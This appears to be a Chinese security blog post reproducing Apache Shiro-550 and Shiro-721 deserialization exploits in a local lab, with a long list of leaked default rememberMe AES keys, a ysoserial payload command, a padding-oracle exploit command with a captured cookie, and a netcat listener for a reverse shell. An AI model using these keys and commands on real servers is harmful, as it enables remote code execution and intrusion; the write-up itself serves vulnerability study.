<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>红队武器库-Apache Shiro 反序列化漏洞 | Zeo's Security Lab</title><meta name="author" content="Zeo"><meta name="copyright" content="Zeo"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="ffffff"><meta name="description" content="Apache Shiro RememberMe 反序列化（Shiro550）Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。 影响组件Apache Shiro &lt;&#x3D; 1.2.4 实际漏洞影响范围如果shiro的rememberMe功能的AES密钥被泄露, 就会导致反序列化漏洞，无论Shiro是什么版本。 目前网上收集到的密钥123">
<meta property="og:type" content="article">
<meta property="og:title" content="红队武器库-Apache Shiro 反序列化漏洞">
<meta property="og:url" content="https://godzeo.github.io/2020/06/03/%E7%BA%A2%E9%98%9F%E6%AD%A6%E5%99%A8%E5%BA%93-Apache%20Shiro%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Zeo&#39;s Security Lab">
<meta property="og:description" content="Apache Shiro RememberMe 反序列化（Shiro550）Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。 影响组件Apache Shiro &lt;&#x3D; 1.2.4 实际漏洞影响范围如果shiro的rememberMe功能的AES密钥被泄露, 就会导致反序列化漏洞，无论Shiro是什么版本。 目前网上收集到的密钥123">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp">
<meta property="article:published_time" content="2020-06-03T09:30:18.000Z">
<meta property="article:modified_time" content="2022-11-28T12:25:22.942Z">
<meta property="article:author" content="Zeo">
<meta property="article:tag" content="WEB安全">
<meta property="article:tag" content="代码审计">
<meta property="article:tag" content="内网">
<meta property="article:tag" content="渗透">
<meta property="article:tag" content="二进制">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp"><link rel="shortcut icon" href="/img/WX20211124-162855.png"><link rel="canonical" href="https://godzeo.github.io/2020/06/03/%E7%BA%A2%E9%98%9F%E6%AD%A6%E5%99%A8%E5%BA%93-Apache%20Shiro%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '红队武器库-Apache Shiro 反序列化漏洞',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-11-28 20:25:22'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', 'ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Zeo's Security Lab" type="application/atom+xml">
</head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231013354.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">125</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">46</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">9</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> List</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> Music</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> Movie</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Zeo's Security Lab</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> List</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> Music</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> Movie</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">红队武器库-Apache Shiro 反序列化漏洞</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2020-06-03T09:30:18.000Z" title="发表于 2020-06-03 17:30:18">2020-06-03</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-11-28T12:25:22.942Z" title="更新于 2022-11-28 20:25:22">2022-11-28</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/WEB-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E5%88%86%E6%9E%90/">WEB 漏洞复现和分析</a></span></div><div class="meta-secondline"></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><span id="more"></span>

<h1 id="Apache-Shiro-RememberMe-反序列化（Shiro550）"><a href="#Apache-Shiro-RememberMe-反序列化（Shiro550）" class="headerlink" title="Apache Shiro RememberMe 反序列化（Shiro550）"></a>Apache Shiro RememberMe 反序列化（Shiro550）</h1><p>Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。</p>
<h2 id="影响组件"><a href="#影响组件" class="headerlink" title="影响组件"></a>影响组件</h2><p>Apache Shiro &lt;&#x3D; 1.2.4</p>
<h2 id="实际漏洞影响范围"><a href="#实际漏洞影响范围" class="headerlink" title="实际漏洞影响范围"></a>实际漏洞影响范围</h2><p>如果shiro的rememberMe功能的AES密钥被泄露, 就会导致反序列化漏洞，无论Shiro是什么版本。</p>
<h2 id="目前网上收集到的密钥"><a href="#目前网上收集到的密钥" class="headerlink" title="目前网上收集到的密钥"></a>目前网上收集到的密钥</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br></pre></td><td class="code"><pre><span class="line">kPH+bIxk5D2deZiIxcaaaA==</span><br><span class="line">wGiHplamyXlVB11UXWol8g==</span><br><span class="line">2AvVhdsgUs0FSA3SDFAdag==</span><br><span class="line">4AvVhmFLUs0KTA3Kprsdag==</span><br><span class="line">fCq+/xW488hMTCD+cmJ3aQ==</span><br><span class="line">3AvVhmFLUs0KTA3Kprsdag==</span><br><span class="line">1QWLxg+NYmxraMoxAXu/Iw==</span><br><span class="line">ZUdsaGJuSmxibVI2ZHc9PQ==</span><br><span class="line">Z3VucwAAAAAAAAAAAAAAAA==</span><br><span class="line">U3ByaW5nQmxhZGUAAAAAAA==</span><br><span class="line">6ZmI6I2j5Y+R5aSn5ZOlAA==</span><br><span class="line">kPH+bIxk5D2deZiIxcaaaA==</span><br><span class="line">4AvVhmFLUs0KTA3Kprsdag==</span><br><span class="line">Z3VucwAAAAAAAAAAAAAAAA==</span><br><span class="line">fCq+/xW488hMTCD+cmJ3aQ==</span><br><span class="line">0AvVhmFLUs0KTA3Kprsdag==</span><br><span class="line">1AvVhdsgUs0FSA3SDFAdag==</span><br><span class="line">1QWLxg+NYmxraMoxAXu/Iw==</span><br><span class="line">25BsmdYwjnfcWmnhAciDDg==</span><br><span class="line">2AvVhdsgUs0FSA3SDFAdag==</span><br><span class="line">3AvVhmFLUs0KTA3Kprsdag==</span><br><span class="line">3JvYhmBLUs0ETA5Kprsdag==</span><br><span class="line">r0e3c16IdVkouZgk1TKVMg==</span><br><span class="line">5aaC5qKm5oqA5pyvAAAAAA==</span><br><span class="line">5AvVhmFLUs0KTA3Kprsdag==</span><br><span class="line">6AvVhmFLUs0KTA3Kprsdag==</span><br><span class="line">6NfXkC7YVCV5DASIrEm1Rg==</span><br><span class="line">6ZmI6I2j5Y+R5aSn5ZOlAA==</span><br><span class="line">cmVtZW1iZXJNZQAAAAAAAA==</span><br><span class="line">7AvVhmFLUs0KTA3Kprsdag==</span><br><span class="line">8AvVhmFLUs0KTA3Kprsdag==</span><br><span class="line">8BvVhmFLUs0KTA3Kprsdag==</span><br><span class="line">9AvVhmFLUs0KTA3Kprsdag==</span><br><span class="line">OUHYQzxQ/W9e/UjiAGu6rg==</span><br><span class="line">a3dvbmcAAAAAAAAAAAAAAA==</span><br><span class="line">aU1pcmFjbGVpTWlyYWNsZQ==</span><br><span class="line">bWljcm9zAAAAAAAAAAAAAA==</span><br><span class="line">bWluZS1hc3NldC1rZXk6QQ==</span><br><span class="line">bXRvbnMAAAAAAAAAAAAAAA==</span><br><span class="line">ZUdsaGJuSmxibVI2ZHc9PQ==</span><br><span class="line">wGiHplamyXlVB11UXWol8g==</span><br><span class="line">U3ByaW5nQmxhZGUAAAAAAA==</span><br><span class="line">MTIzNDU2Nzg5MGFiY2RlZg==</span><br><span class="line">L7RioUULEFhRyxM7a2R/Yg==</span><br><span class="line">a2VlcE9uR29pbmdBbmRGaQ==</span><br><span class="line">WcfHGU25gNnTxTlmJMeSpw==</span><br><span class="line">OY//C4rhfwNxCQAQCrQQ1Q==</span><br><span class="line">5J7bIJIV0LQSN3c9LPitBQ==</span><br><span class="line">f/SY5TIve5WWzT4aQlABJA==</span><br><span class="line">bya2HkYo57u6fWh5theAWw==</span><br><span class="line">WuB+y2gcHRnY2Lg9+Aqmqg==</span><br><span class="line">kPv59vyqzj00x11LXJZTjJ2UHW48jzHN</span><br><span class="line">3qDVdLawoIr1xFd6ietnwg==</span><br><span class="line">ZWvohmPdUsAWT3=KpPqda</span><br><span class="line">YI1+nBV//m7ELrIyDHm6DQ==</span><br><span class="line">6Zm+6I2j5Y+R5aS+5ZOlAA==</span><br><span class="line">2A2V+RFLUs+eTA3Kpr+dag==</span><br><span class="line">6ZmI6I2j3Y+R1aSn5BOlAA==</span><br><span class="line">SkZpbmFsQmxhZGUAAAAAAA==</span><br><span class="line">2cVtiE83c4lIrELJwKGJUw==</span><br><span class="line">fsHspZw/92PrS3XrPW+vxw==</span><br><span class="line">XTx6CKLo/SdSgub+OPHSrw==</span><br><span class="line">sHdIjUN6tzhl8xZMG3ULCQ==</span><br><span class="line">O4pdf+7e+mZe8NyxMTPJmQ==</span><br><span class="line">HWrBltGvEZc14h9VpMvZWw==</span><br><span class="line">rPNqM6uKFCyaL10AK51UkQ==</span><br><span class="line">Y1JxNSPXVwMkyvES/kJGeQ==</span><br><span class="line">lT2UvDUmQwewm6mMoiw4Ig==</span><br><span class="line">MPdCMZ9urzEA50JDlDYYDg==</span><br><span class="line">xVmmoltfpb8tTceuT5R7Bw==</span><br><span class="line">c+3hFGPjbgzGdrC+MHgoRQ==</span><br><span class="line">ClLk69oNcA3m+s0jIMIkpg==</span><br><span class="line">Bf7MfkNR0axGGptozrebag==</span><br><span class="line">1tC/xrDYs8ey+sa3emtiYw==</span><br><span class="line">ZmFsYWRvLnh5ei5zaGlybw==</span><br><span class="line">cGhyYWNrY3RmREUhfiMkZA==</span><br><span class="line">IduElDUpDDXE677ZkhhKnQ==</span><br><span class="line">yeAAo1E8BOeAYfBlm4NG9Q==</span><br><span class="line">cGljYXMAAAAAAAAAAAAAAA==</span><br><span class="line">2itfW92XazYRi5ltW0M2yA==</span><br><span class="line">XgGkgqGqYrix9lI6vxcrRw==</span><br><span class="line">ertVhmFLUs0KTA3Kprsdag==</span><br><span class="line">5AvVhmFLUS0ATA4Kprsdag==</span><br><span class="line">s0KTA3mFLUprK4AvVhsdag==</span><br><span class="line">hBlzKg78ajaZuTE0VLzDDg==</span><br><span class="line">9FvVhtFLUs0KnA3Kprsdyg==</span><br><span class="line">d2ViUmVtZW1iZXJNZUtleQ==</span><br><span class="line">yNeUgSzL/CfiWw1GALg6Ag==</span><br><span class="line">NGk/3cQ6F5/UNPRh8LpMIg==</span><br><span class="line">4BvVhmFLUs0KTA3Kprsdag==</span><br><span class="line">MzVeSkYyWTI2OFVLZjRzZg==</span><br><span class="line">CrownKey==a12d/dakdad</span><br><span class="line">empodDEyMwAAAAAAAAAAAA==</span><br><span class="line">A7UzJgh1+EWj5oBFi+mSgw==</span><br><span class="line">YTM0NZomIzI2OTsmIzM0NTueYQ==</span><br><span class="line">c2hpcm9fYmF0aXMzMgAAAA==</span><br><span class="line">i45FVt72K2kLgvFrJtoZRw==</span><br><span class="line">U3BAbW5nQmxhZGUAAAAAAA==</span><br><span class="line">ZnJlc2h6Y24xMjM0NTY3OA==</span><br><span class="line">Jt3C93kMR9D5e8QzwfsiMw==</span><br><span class="line">MTIzNDU2NzgxMjM0NTY3OA==</span><br><span class="line">vXP33AonIp9bFwGl7aT7rA==</span><br><span class="line">V2hhdCBUaGUgSGVsbAAAAA==</span><br><span class="line">Z3h6eWd4enklMjElMjElMjE=</span><br><span class="line">Q01TX0JGTFlLRVlfMjAxOQ==</span><br><span class="line">ZAvph3dsQs0FSL3SDFAdag==</span><br><span class="line">Is9zJ3pzNh2cgTHB4ua3+Q==</span><br><span class="line">NsZXjXVklWPZwOfkvk6kUA==</span><br><span class="line">GAevYnznvgNCURavBhCr1w==</span><br><span class="line">66v1O8keKNV3TTcGPK1wzg==</span><br><span class="line">SDKOLKn2J1j/2BHjeZwAoQ==</span><br></pre></td></tr></table></figure>

<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>推荐工具 <a target="_blank" rel="noopener" href="https://github.com/feihong-cs/ShiroExploit/_GUI/">https://github.com/feihong-cs/ShiroExploit\_GUI/</a></p>
<p>环境搭建：推荐docker</p>
<p>简单检测，抓包重放后，如果显示rememberMe&#x3D;deleteMe，说明有可利用性</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA1MjYxNDMyMDYucG5n?x-oss-process=image/format,png" alt="image-20200526143206170"></p>
<h3 id="Shiro550无需提供rememberMe-Cookie"><a href="#Shiro550无需提供rememberMe-Cookie" class="headerlink" title="Shiro550无需提供rememberMe Cookie"></a>Shiro550无需提供rememberMe Cookie</h3><p>因为该漏洞没有回显, 所以我们需要先确认漏洞是否存在</p>
<p>这里用DNS解析记录来做判断, 在<a target="_blank" rel="noopener" href="http://www.dnslog.cn/%E4%B8%8A%E8%8E%B7%E5%8F%96%E5%AD%90%E5%9F%9F">http://www.dnslog.cn/上获取子域</a></p>
<p>[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qMyl0JGb-1591176591939)(<a target="_blank" rel="noopener" href="https://gitee.com/godzeo/blogimg/raw/master/img/20200526134702.png/)/]">https://gitee.com/godzeo/blogimg/raw/master/img/20200526134702.png\)\]</a></p>
<p>VPS启动一个nc -lvp 666</p>
<p>反弹shell</p>
<p>[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-E2Ywd8hN-1591176591940)(<a target="_blank" rel="noopener" href="https://gitee.com/godzeo/blogimg/raw/master/img/20200526135057.png/)/]">https://gitee.com/godzeo/blogimg/raw/master/img/20200526135057.png\)\]</a></p>
<p>成功</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA1MjYxMzUyMjEucG5n?x-oss-process=image/format,png" alt="image-20200526135221232"></p>
<h1 id="Apache-Shiro-Padding-Oracle-Attack-Shiro-721"><a href="#Apache-Shiro-Padding-Oracle-Attack-Shiro-721" class="headerlink" title="Apache Shiro Padding Oracle Attack (Shiro-721)"></a>Apache Shiro Padding Oracle Attack (Shiro-721)</h1><p>Apache Shiro 是企业常见的 Java安全框架, 由于<code>Shiro</code>使用<code>AES-CBC</code>模式进行加解密处理, 所以存在<code>Padding Oracle Attack</code>漏洞, 已经登录的攻击者同样可以进行反序列化操作</p>
<h2 id="影响组件-1"><a href="#影响组件-1" class="headerlink" title="影响组件"></a>影响组件</h2><p>Apache Shiro &lt; 1.4.2</p>
<p>Apache Shiro 1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1</p>
<h2 id="漏洞复现-1"><a href="#漏洞复现-1" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>shiro 环境war包 <a target="_blank" rel="noopener" href="https://github.com/jas502n/SHIRO-721">https://github.com/jas502n/SHIRO-721</a></p>
<p>搭建环境 tomcat7 + shiro 1.4.1</p>
<p>[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-s52cCJP5-1591176591942)(<a target="_blank" rel="noopener" href="https://gitee.com/godzeo/blogimg/raw/master/img/20200527140205.png/)/]">https://gitee.com/godzeo/blogimg/raw/master/img/20200527140205.png\)\]</a></p>
<p>该漏洞需要登录后获取到合法的<code>Cookie: rememberMe=XXX</code>后才可以进行利用</p>
<p>看起来不是很好利用但实际上有一些网站是开放注册的</p>
<p>而且这个洞不需要知道服务端密钥，因为该漏洞需是爆破Cookie</p>
<p>访问shiro登录页面，并登陆</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA1MjcxNDAzMDAucG5n?x-oss-process=image/format,png" alt="image-20200527140300087"></p>
<p>登陆后，访问一个业务，抓包</p>
<p>[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2EvvYPE2-1591176591943)(<a target="_blank" rel="noopener" href="https://gitee.com/godzeo/blogimg/raw/master/img/20200526145750.png/)/]">https://gitee.com/godzeo/blogimg/raw/master/img/20200526145750.png\)\]</a></p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA1MjcxNDA0MDcucG5n?x-oss-process=image/format,png" alt="image-20200527140407681"></p>
<p>按照要求填入 rememberMe Cookie</p>
<p>图形化工具失败，不知道怎么回事，利用原始的方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 &#x27;touch /tmp/zeo&#x27; &gt; payload.class</span><br></pre></td></tr></table></figure>

<p>exp 下载地址 <a target="_blank" rel="noopener" href="https://github.com/Geekby/shiro/_rce/_exp">https://github.com/Geekby/shiro\_rce\_exp</a></p>
<p>执行exp爆破</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python shiro_exp.py http://127.0.0.1:8080/samples-web-1.4.1/ X8E4mP300AMIGgimdqHhecoyzK64eNcoovKC5xa+G67RC4OA6mrky14UY5bYLHJhjc5lndRe5iU/cRt4NyDa0QguUKKNC3eBIYqSIVrx5uFLrBs9dzFhG46oMhcIXh80IwXcR8PYSUrm1V2dCydUBdOHLEahzysAi4ED/zxv8HQyvQYaSCdkJdKP5Kh8yagxYNvl6GBCO0FyLxn/dzeVuCfyPh6fIJi9uEIdJ5e72UTKAph+ot5DpcolN2l0DibOE7NCm74YpBrw43RlTNJrtBLh2ngsphanUPpC42K3TZgrXieiMnotTi3VODQmgIa+fF0+ZVxKBOl7VwMlZzJgkmxY2e5Ql28Q2VVt+Wk+jEad/zok70ZjDUUCiopEJlYIlkG22C1zbEbia8IUMtRTsJZnF612x4YvlfX9RFo6bnWXpS/bKFwbaJPiFr6bSTfSy1LInH9u1vscfSMEB8YZ+w6aq73kH3szftfbm/MskuWgqfU28ZLPAbml4IhH3n7c payload.class</span><br></pre></td></tr></table></figure>

<p>经过了爆破</p>
<p>得到padding oracle attack后的cookie</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA1MjcxNzAzMzEucG5n?x-oss-process=image/format,png" alt="image-20200527170142533"></p>
<p>复制该cookie，重放即可成功执行命令</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9naXRlZS5jb20vZ29kemVvL2Jsb2dpbWcvcmF3L21hc3Rlci9pbWcvMjAyMDA1MjcxNzAzMTYucG5n?x-oss-process=image/format,png" alt="image-20200527170316763"></p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="http://www.oniont.cn/index.php/archives/298.html">http://www.oniont.cn/index.php/archives/298.html</a></p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://godzeo.github.io">Zeo</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://godzeo.github.io/2020/06/03/%E7%BA%A2%E9%98%9F%E6%AD%A6%E5%99%A8%E5%BA%93-Apache%20Shiro%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">https://godzeo.github.io/2020/06/03/%E7%BA%A2%E9%98%9F%E6%AD%A6%E5%99%A8%E5%BA%93-Apache%20Shiro%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://godzeo.github.io" target="_blank">Zeo's Security Lab</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2020/06/05/CVE-2020-0796_RCE%E6%BC%8F%E6%B4%9Eexp%E5%A4%8D%E7%8E%B0(%E9%9D%9E%E8%93%9D%E5%B1%8F)/"><img class="prev-cover" src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">CVE-2020-0796_RCE漏洞exp复现(非蓝屏)</div></div></a></div><div class="next-post pull-right"><a 